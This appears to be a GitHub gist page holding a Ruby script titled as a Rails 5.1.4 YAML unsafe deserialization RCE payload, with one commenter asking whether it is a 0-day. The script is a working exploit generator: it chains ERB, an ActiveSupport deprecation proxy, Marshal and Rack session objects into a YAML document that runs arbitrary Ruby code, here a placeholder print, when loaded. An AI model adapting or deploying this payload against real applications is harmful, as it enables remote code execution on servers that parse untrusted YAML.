Create a gist now

Instantly share code, notes, and snippets.

@niklasb /railspwn.rb
Last active Apr 5, 2018

What would you like to do?
Download ZIP
Rails 5.1.4 YAML unsafe deserialization RCE payload
Raw
railspwn.rb
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end
class DeprecatedInstanceVariableProxy
def initialize(instance, method)
@instance = instance
@method = method
@deprecator = ActiveSupport::Deprecation.new
end
end
end
end
code = <<-EOS
puts "pwned"
EOS
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@lineno, 1337
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "")
payload = <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
!ruby/object:Rack::Session::Abstract::SessionHash
req: !ruby/object:Rack::Request
env:
"rack.session": !ruby/object:Rack::Session::Abstract::SessionHash
id: 'hi from espr'
HTTP_COOKIE: "a=#{payload}"
store: !ruby/object:Rack::Session::Cookie
coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
key: a
secrets: []
exists: true
loaded: false
PAYLOAD
puts payload
@RicterZ

This comment has been minimized.

Show comment Hide comment
@RicterZ

RicterZ Nov 21, 2017

A 0-day? I couldn't find any information about this security issue on Rails official website or Github.

RicterZ commented Nov 21, 2017

A 0-day? I couldn't find any information about this security issue on Rails official website or Github.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment